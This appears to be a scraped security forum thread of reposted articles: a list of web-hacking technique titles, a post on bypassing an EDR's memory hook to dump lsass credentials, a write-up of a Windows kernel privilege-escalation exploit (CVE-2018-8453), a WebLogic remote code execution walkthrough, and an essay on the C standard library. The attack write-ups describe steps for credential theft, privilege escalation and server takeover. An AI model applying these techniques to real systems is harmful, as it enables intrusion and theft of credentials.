+ R★Editor comments InsertScript: Adobe Reader PDF - Client Side Request Injection $36k Google App Engine RCE - Ezequiel Pereira MKSB(en): CVE-2018-5175: Universal CSP strict-dynamic bypass in Firefox #341876 SSRF in Exchange leads to ROOT access in all instances reCAPTCHA bypass via HTTP Parameter Pollution – Andres Riancho Data Exfiltration via Formula Injection #Part1 Read&Write Chrome Extension Same Origin Policy (SOP) Bypass Vulnerability | The Hacker Blog Firefox uXSS and CSS XSS - Abdulrahman Al-Qabandi Server-Side Spreadsheet Injection - Formula Injection to Remote Code Execution - Bishop Fox Bypassing Web-Application Firewalls by abusing SSL/TLS | 0x09AL Security blog Evading CSP with DOM-based dangling markup | Blog Save Your Cloud: DoS on VMs in OpenNebula 4.6.1 CRLF Injection Into PHP’s cURL Options – TomNomNom – Medium Practical Web Cache Poisoning | Blog #317476 Account Takeover in Periscope TV A timing attack with CSS selectors and Javascript VPN Extensions are not for privacy Exposing Intranets with reliable Browser-based Port scanning | Blog Exploiting XXE with local DTD files A story of the passive aggressive sysadmin of AEM - Speaker Deck Hunting for security bugs in AEM webapps - Speaker Deck ASP.NET resource files (.RESX) and deserialisation issues Story of my two (but actually three) RCEs in SharePoint in 2018 | Soroush Dalili (@irsdl) – سروش دلیلی Beware of Deserialisation in .NET Methods and Classes + Code Execution via Paste! cat ~/footstep.ninja/blog.txt Blog - RCE due to ShowExceptions MB blog: Vulnerability in Hangouts Chat: from open redirect to code execution Blog on Gopherus Tool DNS Rebinding Headless Browsers It's A PHP Unserialization Vulnerability Jim But Not As We Know It James Kettle @albinowax Sursa: https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018-nominations-open
      • 1
      • Upvote
  19. Bypass EDR’s memory protection, introduction to hooking Hoang BuiFollow Jan 18 Introduction On a recent internal penetration engagement, I was faced against an EDR product that I will not name. This product greatly hindered my ability to access lsass’ memory and use our own custom flavor of Mimikatz to dump clear-text credentials. For those who recommends ProcDump The Wrong Path So now, as an ex-malware author — I know that there are a few things you could do as a driver to accomplish this detection and block. The first thing that comes to my mind was Obregistercallback which is commonly used by many Antivirus products. Microsoft implemented this callback due to many antivirus products performing very sketchy winapi hooks that reassemble malware rootkits. However, at the bottom of the msdn page, you will notice a text saying “Available starting with Windows Vista with Service Pack 1 (SP1) and Windows Server 2008.” To give some missing context, I am on a Windows server 2003 at the moment. Therefore, it is missing the necessary function to perform this block. After spending hours and hours, doing black magic stuff with csrss.exe and attempting to inherit a handle to lsass.exe through csrss.exe, I was successful in gaining a handle with PROCESS_ALL_ACCESS to lsass.exe. This was through abusing csrss to spawn a child process and then inherit the already existing handle to lsass. There is no EDR solution on this machine, this was just an PoC However, after thinking “I got this!” and was ready to rejoice in victory over defeating a certain EDR, I was met with a disappointing conclusion. The EDR blocked the shellcode injection into csrss as well as the thread creation through RtlCreateUserThread. However, for some reason — the code while failing to spawn as a child process and inherit the handle, was still somehow able to get the PROCESS_ALL_ACCESS handle to lsass.exe. WHAT?! Hold up, let me try just opening a handle to lsass.exe without any fancy stuff with just this line: HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lsasspid); And what do you know, I got a handle with FULL CONTROL over lsass.exe. The EDR did not make a single fuzz about this. This is when I realized, I started off the approach the wrong way and the EDR never really cared about you gaining the handle access. It is what you do afterward with that handle that will come under scrutiny. Back on Track Knowing there was no fancy trick in getting a full control handle to lsass.exe, we can now move forward to find the next point of the issue. Immediately calling MiniDumpWriteDump() with the handle failed spectacularly. Let’s dissect this warning further. “Violation: LsassRead”. I didn’t read anything, what are you talking about? I just want to do a dump of the process. However, I also know that to make a dump of a remote process, there must be some sort of WINAPI being called such as ReadProcessMemory (RPM) inside MiniDumpWriteDump(). Let’s look at MiniDumpWriteDump’s source code at ReactOS. Multiple calls to RPM As you can see by, the function (2) dump_exception_info(), as well as many other functions, relies on (3) RPM to perform its duty. These functions are referenced by MiniDumpWriteDump (1) and this is probably the root of our issue. Now here is where a bit of experience comes into play. You must understand the Windows System Internal and how WINAPIs are processed. Using ReadProcessMemory as an example — it works like this. ReadProcessMemory is just a wrapper. It does a bunch of sanity check such as nullptr check. That is all RPM does. However, RPM also calls a function “NtReadVirtualMemory”, which sets up the registers before doing a syscall instruction. Syscall instruction is just telling the CPU to enter kernel mode which then another function ALSO named NtReadVirtualMemory is called, which does the actual logic of what ReadProcessMemory is supposed to do. — — — — — -Userland — — — —- — — — | — — — Kernel Land — — — — RPM — > NtReadVirtualMemory --> SYSCALL->NtReadVirtualMemory Kernel32 — — -ntdll — — — — — — — — — - — — — — — ntoskrnl With that knowledge, we now must identify HOW the EDR product is detecting and stopping the RPM/NtReadVirtualMemory call. This comes as a simple answer which is “hooking”. Please refer to my previous post regarding hooking here for more information. In short, it gives you the ability to put your code in the middle of any function and gain access to the arguments as well as the return variable. I am 100% sure that the EDR is using some sort of hook through one or more of the various techniques that I mentioned. However, readers should know that most if not all EDR products are using a service, specifically a driver running inside kernel mode. With access to the kernel mode, the driver could perform the hook at ANY of the level in the RPM’s callstack. However, this opens up a huge security hole in a Windows environment if it was trivial for any driver to hook ANY level of a function. Therefore, a solution is to put forward to prevent modification of such nature and that solution is known as Kernel Patch Protection (KPP or Patch Guard). KPP scans the kernel on almost every level and will triggers a BSOD if a modification is detected. This includes ntoskrnl portion which houses the WINAPI’s kernel level’s logic. With this knowledge, we are assured that the EDR would not and did not hook any kernel level function inside that portion of the call stack, leaving us with the user-land’s RPM and NtReadVirtualMemory calls. The Hook To see where the function is located inside our application’s memory, it is as trivial as a printf with %p format string and the function name as the argument, such as below. However, unlike RPM, NtReadVirtualMemory is not an exported function inside ntdll and therefore you cannot just reference to the function like normal. You must specify the signature of the function as well as linking ntdll.lib into your project to do so. With everything in place, let’s run it and take a look! Now, this provides us with the address of both RPM and ntReadVirtualMemory. I will now use my favorite reversing tool to read the memory and analyze its structure, Cheat Engine. ReadProcessMemory NtReadVirtualMemory For the RPM function, it looks fine. It does some stack and register set up and then calls ReadProcessMemory inside Kernelbase (Topic for another time). Which would eventually leads you down into ntdll’s NtReadVirtualMemory. However, if you look at NtReadVirtualMemory and know what the most basic detour hook look like, you can tell that this is not normal. The first 5 bytes of the function is modified and the rest are left as-is. You can tell this by looking at other similar functions around it. All the other functions follows a very similar format: 0x4C, 0x8B, 0xD1, // mov r10, rcx; NtReadVirtualMemory 0xB8, 0x3c, 0x00, 0x00, 0x00, // eax, 3ch — aka syscall id 0x0F, 0x05, // syscall 0xC3 // retn With one difference being the syscall id (which identifies the WINAPI function to be called once inside kernel land). However, for NtReadVirtualMemory, the first instruction is actually a JMP instruction to an address somewhere else in memory. Let’s follow that. CyMemDef64.dll Okay, so we are no longer inside ntdll’s module but instead inside CyMemdef64.dll’s module. Ahhhhh now I get it. The EDR placed a jump instruction where the original NtReadVirtualMemory function is supposed to be, redirect the code flow into their own module which then checked for any sort of malicious activity. If the checks fail, the Nt* function would then return with an error code, never entering the kernel land and execute to begin with. The Bypass It is now very self-evident what the EDR is doing to detect and stop our WINAPI calls. But how do we get around that? There are two solutions. Re-Patch the Patch We know what the NtReadVirtualMemory function SHOULD looks like and we can easily overwrite the jmp instruction with the correct instructions. This will stop our calls from being intercepted by CyMemDef64.dll and enter the kernel where they have no control over. Ntdll IAT Hook We could also create our own function, similar to what we are doing in Re-Patch the Patch, but instead of overwriting the hooked function, we will recreate it elsewhere. Then, we will walk Ntdll’s Import Address Table, swap out the pointer for NtReadVirtualMemory and points it to our new fixed_NtReadVirtualMemory. The advantage of this method is that if the EDR decides to check on their hook, it will looks unmodified. It just is never called and the ntdll IAT is pointed elsewhere. The Result I went with the first approach. It is simple, and it allows me to get out the blog quicker :). However, it would be trivial to do the second method and I have plans on doing just that within a few days. Introducing AndrewSpecial, for my manager Andrew who is currently battling a busted appendix in the hospital right now. Get well soon man. AndrewSpecial.exe was never caught :P Conclusion This currently works for this particular EDR, however — It would be trivial to reverse similar EDR products and create a universal bypass due to their limitation around what they can hook and what they can’t (Thank you KPP). Did I also mention that this works on both 64 bit (on all versions of windows) and 32 bits (untested)? And the source code is available HERE. Thank you again for your time and please let me know if I made any mistake. Sursa: https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
  20. CVE-2018-8453:Win32k Elevation of Privilege Vulnerability Targeting the Middle East 2019-01-19 By 360威胁情报中心 | 技术研究 Background On October 10, 2018, Kaspersky disclosed a Win32k Elevation of Privilege Exploit (CVE-2018-8453) captured in August. This vulnerability was used as 0day in attacks targeting the Middle East to escalate privileges on the compromised Windows systems. It is related to window management and graphic device interfaces (win32kfull.sys) and could be used to elevate user privileges to system permissions. It can also be used to bypass sandbox protection such as PDF, Office and IE which makes the exploit extremely valuable. 360 Threat Intelligence Center performed deep analysis of this vulnerability and came up with PoC exploit that could work on part of the affected Windows systems (Both x86 and x64 version of Windows10). Analysis Environment The work was performed on Windows 10 x64 Version 1709 with patches before fixing CVE-2018-8453: Root Cause This vulnerability is caused by a fault in the win32kfull!NtUserSetWindowFNID function which fails to check whether the window object has been released while setting the FNID. This causes a new FNID to be set for a window that has already been released (FNID_FREED: 0x8000). By exploiting this defect, we can control the fnDWORD callback called in xxxFreeWindow when the window object get destroyed to cause UAF of pSBTrack in win32kfull!xxxSBTrackInit. About FNID:By checking the leaked source code of WIN2000 and related documentations in ReactOs, we figure out that FNID is used to record what the window looks like, such as a button or an edit box. It can also be used to record the state of the window, for example, FNID_FREED(0x8000) means the window has been released. POC – How to Trigger the Vulnerability The vulnerability could get triggered by following steps: Step 1: We need to hook two callbacks in the KernelCallbackTable first. Step 2: Create the main window and the ScrollBar. Step3: Send a WM_LBUTTONDOWN message to the scroll bar to trigger the call to the xxxSBTraackInit function. Hint: When you perform a left click on a scroll bar, it will trigger the call to win32kfull!xxxSBTrackInit function. After that, function xxxSBTrackLoop will be called to capture mouse events in a loop, until the left mouse button is released or some other messages are received. Step4: Call DestoryWindow(g_hMAINWND) in callback function fnDWORD_hook when it get executed by xxxSBTrackLoop. This will result in calling win32kfull!xxxFreeWindow function. Because cbWndExtra is not 0 while registering the main window, this makes win32kfull!xxxFreeWindow to call xxxClientFreeWindowClassExtraBytes function in order to release the extra data which belongs to the main window. Function in the above picture would execute KernelCallbackTable[126] callback which result in the calling of our second hook. Step5: After entering our second hook function (fnClientFreeWindowClassExtraBytesCallBack_hook), we must manually call NtUserSetWindowFNID(g_hMAINWND,spec_fnid) to set the FNID of the main window (a value from 0x2A1 to 0x2AA, here we set spec_find to 0x2A2). Meanwhile create a new scroll bar (g_hSBWNDNew) and call SetCapture(g_hSBWNDNew) to set g_hSBWNDNew as the window to capture mouse events in the current thread. Step6: Since the main window is destroyed, xxxSBTrackLoop will return and continue to execute HMAssignmentUnLock(&pSBTrack->spwndNotify) to perform related dereference that makes the main window get released completely. This will cause xxxFreeWindow to be called again: From the above picture, we know that once xxxFreeWindow is called, the window's FNID will be marked with 0x8000. Since the FNID of the main window was set to 0x2A2 in step 5, LOWORD(FNID) would be 0x82A2 (DestoryWindow function that get executed in step 4 called xxxFreeWindow to mark the main window with 0x8000). So SfnDWORD will be executed and then get into our hook through callback fnDWORD. When get into fnDWORD_hook function again, it is our last chance to come back to R3. At this time, if SendMessage(g_hSBWNDNew, WM_CANCLEMODE) is called, xxxEndScroll (see win2k code as shown below) will be executed to release pSBTrack. Because the POC program is single threaded, all windows created by the thread point to the same thread information structure. Even if the Scrollbar window that SBTrack belongs to has been released, as long as the new window is created by the same thread, pSBTrack still points to the same one. The condition qp->spwndCapture==pwnd will be satisfied since we are sending the WM_CANCLEMODE message to the newly created scroll bar g_hSBWNDNew, and we have previously called SetCaputure(g_hSBWNDNew) to set the current thread to capture the mouse events in g_hSBTWNDNew window. Finally, UserFreePool(pSBTrack) gets executed to release pSBTrack which makes pSBTrack get released before executing HMAssignmentUnLock(&pSBTrack->spwndSB) and results in Use After Free for pSBTrack. Exploit on Windows 10 x64 Since we can make the pSBTrack in win32kfull!xxxSBTrackInit get released early to make a Use After Free by hooking callbacks in KernelCallbackTable, pool fengshui technology can be used to occupy pSBTrack that has been released early in order to achieve arbitrary memory value deduction in a loop. It can be used with desktop heap memory [2] leak and GDI Palette Abuse technology to achieve arbitrary memory read/write, and finally to achieve privilege escalation! Implementation of Arbitrary Memory Value Deduction From the above analysis, we know that the memory pointed by pSBTrack has been released after calling HMAssignmentUnlock(&pSBTrack->spwndSBNotify). Continue to the next HMAssignmentUnlock(&pSBTrack->spwndSB), then take a look at the disassembly code of HMAssignmentUnlock and you will find a very interesting place: Execution of lock xadd dword ptr [rdx+8],eax will perform minus one operation to the DWORD pointed by rdx+8. After debugging the code, we figure out that pSBTrack->spwndSB is assigned to* rdx*! So, if we can control the value of pSBTrack->spwndSB, then we can perform minus one operation on any memory DWORD. pSBTrack is released after we call SendMessage(g_SBWNDNew, WM_CANCELMODE). So if we can allocate an object (such as Bitmap) with the same size as SBTrack immediately and could control the data of the object, there is a great probability that the pool get freed will be reassigned to the object. Test Results: Similarly, continue to call HMAssignmentUnlock (&pSBTrack->spwndSBTrack), there will be another arbitrary memory value minus one operation, while the memory is pointed by pSBTrack->spwndSBTrack+8. So we can reduce the arbitrary memory value by one or two through controlling the data in the Bitmap that get sprayed into the space previously used by pSBTrack. Minus one operation only requires either pSBTrack->spwndSB or pSBTrack->spwndSBTrack to be 0, and the other one to be address - sizeof(PVOID). As long as we repeatedly trigger this process, we can reduce the memory value by one or two for many times in order to change the value to a specified number. result = target - repeat_count result = target - repeat_count * 2 Obviously we have to know the original value first in order to make it reduced to the value we want. Therefore, there are some limitations when compared with setting the value directly. Hint: If we need to change 0x02000000 to 0x00000000, do we need to repeat the minus two operation for 0x01000000 times? The answer is no. Because we are able to deduct arbitrary memory DWORD value by one or two, the memory address could be adjusted to turn "0x02" into a low Byte in the DWORD. Then it becomes to change 0x00000002 to 0x00000000, here just need one loop and no need to worry about the loop count limitations. Use the GDI Palette to Achieve Arbitrary R/W Below is the documented PALETTE data structure: typedef struct _PALETTE64 { BASEOBJECT64 BaseObject; ... ULONG64 pRGBXlate; PALETTEENTRY *pFirstColor; struct _PALETTE *ppalThis; PALETTEENTRY apalColors[3]; } 1 2 3 4 5 6 7 8 9 10 Member apalColors is an array. Each member in the array is 4 bytes in size and the content can be specified by user. pFirstColor, similar to the pvScan0 pointer in the Bitmap, is pointed to the array and could be used to construct the R/W primitive. The following relationship is satisfied and by using this we can know the initial value of the memory pointed by pFirstColor: Address of PALETTEENTRY = Address of pFirstColor + sizeof(PVOID)*2 1 Similar to manipulating data in the Pixel area by Bitmap through GetBitmapBits and SetBitmapBits, PALETTE will use GetPaletteEntries and SetPaletteEntries to manipulate the data pointed by the pFirstColor. So we can construct two Palettes, named as hManager and hWorker respectively: If we can get the value of hManager's pFirstColor and hWorker's pFirstColor, then we can use the above arbitrary memory value deduction approach to reduce the hManager->pFirstColor value to the same as hWorker's pFirstColor. After that we can use hManager to call SetPaletteEntries to control hWorker->pFirstColor, then use hWorker to call SetPaletteEntries and GetPaletteEntries to achieve arbitrary memory read/write. Fortunately, we can use the following techniques to stabilize the value of hManager's pFirstColor and hWorker's pFirstColor, and make hManager's pFirstColor value not quite larger than hWorker's pFirstColor value. Use the Desktop Heap to Leak GDI Palette Address Since the name of window menu could be quite long, lpszMenuName and Palette are in the same memory pool, and we can get the kernel address of lpszMenuName through the tagWND pointer returned by HmValidateHandle, we can use the desktop heap[2] to help us predict the kernel address of the pFirstColor pointer. With proper construction, the accuracy rate could reach to 100%. First we need to repeatedly create and delete a window object to allocate and release a pit. When the address becomes unchanged, it means the next time you construct a Palette object with a size equal to lpszMenuName, the Palette object will be allocated at the address of the lpszMenuName that has just been released: Then we can get the kernel address of pFirstColor by using its offset inside _PALETTE64: hManager->pFirstColor can be changed to hWorker's pFirstColor value by using the above arbitrary deduction operation in order to achieve arbitrary memory read/write. Privilege Escalation by Arbitrary Memory R/W Since arbitrary memory read/write is available at this moment, we could enumerate EPROCESS chain to get the token value of the system process as well as the token address of the current process. Then we could perform privilege escalation by copying the token value from the system process to the current one. How to get the EPROCESS of the system at the user level? You can get it by looking up PsInitialSystemProcess[3] in ntoskrnl.exe: Code to get _EPROCES of the current process: Use arbitrary memory read/write to copy Token: Exploit Process in Summary 360 Threat Intelligence Center summarized the entire process as follows: Get the pFirstColor value of hManager and hWorker by using desktop heap leak technology Triggering the vulnerability multiple times to change the value of hManager->pFirstColor to the value of pFirstColor in hWorker Perform privilege escalation by arbitrary memory read/write Using arbitrary memory read/write to spoof the operating system not to clean up the Bitmap object. Without this step, the system will release the Bitmap object when the program gets closed. It will cause a Double Free and result in Blue Screen. Screenshot: Patch Analysis By using Bindiff, we find that IsWindowBeingDestroyed is called to check if the window has been released before setting a new FNID in the patched version of win32kfull!NtUserSetWIndowFNID. It will return directly if the window object has been released, and will not allow setting a new FNID value. So when we call DestoryWindow, we will fail to call NtSetUserWindowFNID to set FNID. The vulnerability gets fixed since this approach prevents us from releasing pSBTrack in advance. Conclusion After investigations, we come up with PoC exploit on Windows 10 pro v1709 x86/x64 and perform privilege escalation successfully when the system is not patched. For other Windows versions, only need to change offsets of corresponding data structures, such as the offset of Token inside _EPROCESS. References [1].https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/ [2].https://blogs.msdn.microsoft.com/ntdebugging/2007/01/04/desktop-heap-overview/ [3].https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/mm64bitphysicaladdress [4].https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig [5].https://www.anquanke.com/post/id/168572#h2-1 [6].https://www.anquanke.com/post/id/168441#h2-0 [7].ed2k://|file|cn_windows_10_multi-edition_vl_version_1709_updated_sept_2017_x64_dvd_100090774.iso|4630972416|8867C5E54405FF9452225B66EFEE690A|/ Sursa: https://ti.360.net/blog/articles/cve-2018-8453-win32k-elevation-of-privilege-vulnerability-targeting-the-middle-east-en/
  21. [Video] Proof of Concept: CVE-2018-2894 Oracle WebLogic RCE Kristian Bremberg/November 14, 2018 A recent vulnerability was sent in to Crowdsource affecting Oracle WebLogic Server. The vulnerability is an unauthenticated remote code execution (RCE) that is easily exploited. In this article we will go through the technical aspects of the Oracle WebLogic RCE vulnerability and its exploitation. Proof of concept video: How the exploit works: The vulnerability is affecting the Web Services (WLS) subcomponent. The path: /ws_utc/config.do(on port 7001) is by default reachable without any authentication, however this pages is only available in development mode. In order to make this vulnerability exploitable, the attacker needs to set a new Work Home Dir which has to be writable. The path: servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/cssworks for this. After the new writable Work Home Dir is sat, it is then possible to upload a JSP file in the Security tab. Image: The interface where it is possible to save a Work Home Dir which will be the path where JKS keystores will be saved. The page lets an attacker upload JKS Keystores which are Java Server Pages (JSP) files. These uploaded files are then possible to access and execute. Then it is possible to do a file upload as a multipart/form-data to the path: ws_utc/resources/setting/keystore The server will then respond with XML containing the keyStoreItem ID which is used to reach the uploaded file in the format of:/ws_utc/css/config/keystore/1582617386107_filename.jsp Image: After a successful upload of a JKS Keystore the response will contain its ID. Impact: If a hacker acts upon this vulnerability, they may be able to completely compromise the server. However, due to the test page only existing in development mode, it is very important to check that your WebLogic server is not running in development mode. In some cases the port 7001 is filtered and therefore not reachable on the Internet. For an attacker it is very easy to detect this vulnerability. WebLogic is easily fingerprinted (with its Server header) and a quick search on Shodan shows that there are many instances open on the Internet. Additional information: For the full security advisory about Orable Weblogic RCE, read more on Oracle Critical Patch Update Advisory. Log into your Detectify account to find out if your applications are vulnerable and get the remediation tips. Questions or comments? Let us know in the section below. Begin a scan for the latest vulnerabilities today. Start a free trial with Detectify here! Detectify is a continuous web scanner monitor service that can be set up for automated scanning for 1000+ known vulnerabilities including the OWASP Top 10. Check for the latest vulnerabilities! Written by Krisitian Bremberg Edited by Jocelyn Chan Sursa: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/
  22. Inside the C Standard Library January 19, 2019 Newsletter ↳ After diving into the C language through K&R, and then studying portability (see C Portability Lessons from Weird Machines), my next challenge was to take a systematic look at the standard library. To do this I worked through P. J. Plauger’s book The Standard C Library (ISBN 978-0131315099) where he examines an implementation of all the functions. It has a chapter for each header, with background information, an excerpt from the C89 standard, tips on use, and full implemention with tests. The author was on the X3J11 committee that defined ANSI C. As I worked through the book – trying first to write the examples myself, then comparing his code to mine, and finally running the examples – I kept notes with questions about portability, rationale, and C behavior. By cross-referencing the following books, asking questions on IRC, and browsing StackOverflow and the comp.lang.c archives, I found satisfactory answers. “The C Standard: Incorporating Technical Corrigendum 1” by The British Standards Institution (ISBN 978-0470845738). This is the C99 standard itself (rather than C89 like Plauger’s book), and it includes an entire first half devoted to the rationale behind language and library choices. This is helpful for understanding C semantics. “Portable C Software” by Mark R. Horton (ISBN 978-0138680503). Written after ANSI C was standardized, but early enough where it wasn’t fully adopted. He provides early history of each standard library function, as well as some functions that are now defunct. “Portable C” by Henry Rabinowitz (ISBN 978-0136859673). Great for illustrating the design decisions of the language as it relates to diverse hardware. “The CERT C Coding Standard” by Robert C. Seacord (ISBN 978-0321984043). Illustrates potential insecurity with, among other things, the standard library. Lists real code that caused vulnerabilities. “C Programming FAQs” by Steve Summit (ISBN 978-0201845198). I can see why these were historically the most frequently asked questions. I asked many of them myself. This article is not a comprehensive explanation of the standard by any means. It’s just things that were new or interesting to me. Some of it may be old news to you, and conversely I may have omitted something that seemed basic to me but would have been useful to mention. The focus is C89, with comparisons to the later standards C99 and C11 when relevant. Brief History of the Library Functions in the library grew organically from communities of programmers sharing ideas and implementations. Many groups of people used C on Unix throughout the 70s, across multiple architectures. They wrote compilers with extra features, and experimented with additions to Unix. By February 1978 core C practice had stabilized to the point where Kernighan and Ritchie codified it in the first edition of their book The C Programming Language (ISBN 978-0131101630). By 1980 C users formed the “/usr/group” organization to combine their library experience into an informal standard, which they released in 1984. Meanwhile in 1983, the American National Standards Institute (ANSI) formed a committee, X3J11, to establish a standard specification of C and officially standardize the library. The committee reviewed the work of /usr/group, K&R 1st edition, and various compiler extensions. They deliberated from 1983 to 1989 to produce the C89 standard (“ANSI C”). “Design by committee” may not have pleasant associations for some people, but in this case the committee drew on a lot of experience, and often declined to speculatively innovate, working to clarify existing practice instead. The result was a small, tight language and standard library. Compared with libraries in other languages, the standard C library is lean. It doesn’t have much in the way of general algorithms or containers. This helped the language port easily and more widely. The library has basic facilities for time, math, I/O etc, and operates on simple types. It also provides portable facilities to do non-portable things, like variadic arguments, and non-local gotos. assert.h A simple way to halt a program with debugging information if an assumption doesn’t hold: #include <assert.h> int main(void) { assert(1 == 0); } /* outputs Assertion failed: (1 == 0), function main, file assert.c, line 2. Abort trap: 6 */ Because it echoes the statement under test and includes a filename and line number, it’s useful for a quick and dirty test suite. Furthermore, assert() calls abort() rather than exit(), which causes the program to quit and dump core if permitted by the operating system. If the binary was compiled with debugging support you can load that core file in a debugger and inspect the program’s full state at the time the assertion was made: gdb -c /path/to/corefile # ^^^ inspect variables, backtrace, etc in the debugger This means that littering functions liberally with assertions can be a good way to debug problems. It provides richer information than debug print statements in situations where it’s OK to terminate the program. It also adds no overhead to the final release, because the assertions will be removed by the preprocessor when compiled with NDEBUG defined. This can be done by adding -DNDEBUG to CFLAGS or by adding a regular #define NDEBUG in the code. All headers in the standard library are idempotent, except assert.h. By including it multiple times in a file you can enable or disable the assert macro. #define NDEBUG #include <assert.h> /* Now assert() won't do anything... */ #undef NDEBUG #include <assert.h> /* Now assert() works again */ It’s OK to include assert.h twice in a row because it causes what C calls a “benign” redefinition of the assert macro. /* no harm, this is a benign redefinition: */ #define FUN 1 #define FUN 1 /* not benign and not allowed: */ #define FUN 1 #define FUN 2 A properly designed assert macro should work in any context, even somewhere weird like for (i = 0, assert(n<10); i < n; ++i). Because I didn’t think of this, my own attempt at writing assert used an if statement. In fact this is what Mark Horton shows in his Portable C Software book: /* incorrect definition */ #ifndef NDEBUG #define assert(p) (if(!(p)) ... ) #else #define assert(p) ; #endif This can be improved. Plauger uses the ternary operator, and substitutes the result ((void)0) when the predicate holds. He also keeps the code (to print the error and exit) in a real function which is defined in a separate source file. That’s because headers in the standard library are not allowed to include each other. It’s a self-imposed discipline. The last trick I found interesting was how to delay preprocessor evaluation into two steps using these helpers: /* a "thunk" to evaluate __LINE__ */ #define _STR(x) _VAL(x) #define _VAL(x) #x The string can then be built as "Assertion failed: " #p ", file " __FILE__ ", line " _STR(__LINE__) "\n" Finally, some implementations tolerate an arbitrary scalar expression as the argument to assert, but the ANSI committee decided to require int expressions for correct operation. Given that it was the first header I saw in Plauger’s book, this is where I learned that the standard reserves names like _Foo starting with underscore and a capital letter, for the standard library. Don’t use that naming convention in regular code. ctype.h Although I learned a few things from this header, it was ultimately kind of a letdown. It’s not sufficient for international text processing because, while the functions operate on the int type, they specify that its value should fall in the range of unsigned char or the negative value EOF. So while non-English speakers can use a new codepage for their locale, it will be unable to hold more than 255 symbols (plus \0, plus EOF), which is too few for east asian languages. C99 introduced wctype.h to operate on wide characters, but that has its own problems. (More about that in the stdlib.h section below.) Even for languages which fit in an 8-bit codepage, the ctype functions don’t always suffice. For example the German letter ß uppercases into two letters, SS. The tupper() function in ctype.h can’t handle it, replacing one character with another. The greek letter Σ ordinarily lowercases to σ, except at the end of a word where it should be ς. The tolower() function doesn’t have enough context to pick the correct form. I still learned some interesting techniques by studying this header. Plauger implements all the isxxxxx() functions with a lookup table of bit-packed shorts. The table itself is specific to EOF (from stdio.h) being -1, and relies on a certain size of unsigned char. The code uses a nice trick to fail early on a system where this assumption is incorrect: #include <limits.h> #include <stdio.h> #if EOF != -1 || UCHAR_MAX != 255 #error WRONG TABLES IN CTYPE.H #endif Although the code is non-portable, it fails in the most honest and upfront way possible at compile time. Also as a historical note, the isxxxxx() functions used to be defined only for 7-bit characters, but ANSI requires them to handle all values for unsigned char. One advantage of using a lookup table is that the value to be looked up requires only one evaluation. Thus the lookup function can be a macro without danger of executing code with a side effect more than once. /* evaluates c at least twice */ #define isalpha(c) \ (((c) >= 'a' && (c) <= 'z') || ((c) >= 'A' && (c) <= 'Z')) /* evaluates c only once */ #define isalpha(c) (_Ctype[(int)(c)] & (_LO|_UP)) /* consider how this would behave */ if (isalpha(c = getchar())) ... Using macros for these little functions is good for performance. However, every library function in the standard library (unless specifically noted otherwise) must be represented as an actual function too, in case a program wishes to pass its address as a parameter to another function. How can we define a function called “isalpha” if that name is also recognized by the preprocessor? I learned you can just enclose the name in parens: int (isalpha)(int c) { return (_Ctype[(int)(c)] & (_LO|_UP)); } /* now &isalpha will be defined if needed */ The trick is used throughout the standard library but I first saw it in ctype. Conversely, every library function is a candidate for redefinition as a macro, provided that the macro evaluates each of the arguments exactly once and parenthesizes them thoroughly. (Well, getc is an exception but more on that later.) Another trick is to perform an array lookup using a pointer that is shifted forward in the original array. static const short ctyp_tab[257] = {0, /* ... */}; const short *_Ctype = &ctyp_tab[1]; The shifted pointer allows EOF (-1) to be looked up easily without undefined behavior. The expression _Ctype[EOF] means _Ctype[-1] which is the same as *(ctyp_tab+1-1), which does not attempt to dereference – or even point to – memory before a primary data object. Pointers are allowed to be assigned only addresses either inside, or one space to the right, of a data object. (Data objects are arrays, structures, or regions allocated from the heap. See Rabinowitz’s book for a good discussion of this.) Character codes 128-255 are interpreted as negative numbers when considered as signed char. C does not specify whether char is signed or unsigned (it varies by platform). When char is signed, beware of converting it to int for the ctype functions. The integral promotion will “sign-extend,” creating a negative int value. This is not suitable for ctype functions, which require int values that are either storable in unsigned char or are the special EOF value. To avoid sign extension, cast char values to unsigned char in calls to ctype functions. errno.h Errno is the mechanism everyone loves to hate. The X3J11 committee wanted to remove it but decided not to make such a radical innovation on existing practice. In the early drafts of the standard it was kept it in stddef.h, but they decided that stddef should exist on freestanding environments and they split errno.h off into its own header. Not much to say about it. The errno global variable is set to zero at the start of program execution. Library functions can set it to nonzero values but will never set it to zero themselves. To use it, explicitly set it to zero yourself, call a library function, then check whether errno changed. One interesting tidbit is that errno is sometimes not a global variable at all, but a macro for (*_Error()). Having to set a real data object immediately after performing hardware floating point ops would break the FPU pipeline. Allowing the check to be deferred until requested with this _Error() function doesn’t break the pipeline. float.h, limits.h, and math.h Both float.h and limits.h are inventions of the committee. You can generate them with the enquire program written by Steven Pemberton. It performs runtime checks on the data types to find information about them, then generates the desired header file. It’s extremely portable. It also detects and outputs information about the representation of base types, like endianness. I decided not to slow down to study these headers in depth because I lack the knowledge of floating point representation necessary to understand the internals of the functions inside. I do know the definitions and parameters in float.h were recommended by numerical analysts on the Committee. The set was chosen so as not to prejudice an implementation’s selection of floating-point representation. The math functions are written carefully to avoid overflow and underflow. I’ll revisit the topic after studying Michael Overton’s short book, “Numerical Computing with IEEE Floating Point Arithmetic.” locale.h Changing a program’s locale tells it how to handle local customs. There are multiple locale categories that can be adjusted independently. They control different things, like the codeset used by ctype, the date or monetary formatting desired, or alphabetical sort order. Typically all categories are set to the same locale. The alternative – a so called “mixed locale” – is less common. Some of the settings are meant for interpretation by your own program, and others automatically affect the C standard library. For example, when parsing a double, strtod checks what the current locale uses for a decimal point symbol. Even if you want to avoid ctype and use a third-party Unicode library, some of the locale information is still useful for your program. By default C programs use the “C” locale, which is ASCII text and American formatting. The most respectful thing, though, is to accept the locale in all categories as set by system environment variables. This is indicated by the empty string for locale name. #include <locale.h> #include <stdio.h> #include <stdlib.h> int main(void) { if (setlocale(LC_ALL, "") == NULL) { fputs("Unable to select system locale", stderr); return EXIT_FAILURE; } /* ... */ } To see what locales are known on your local system, run locale -a There are 203 installed on MacOS. The list begins with: en_NZ nl_NL.UTF-8 pt_BR.UTF-8 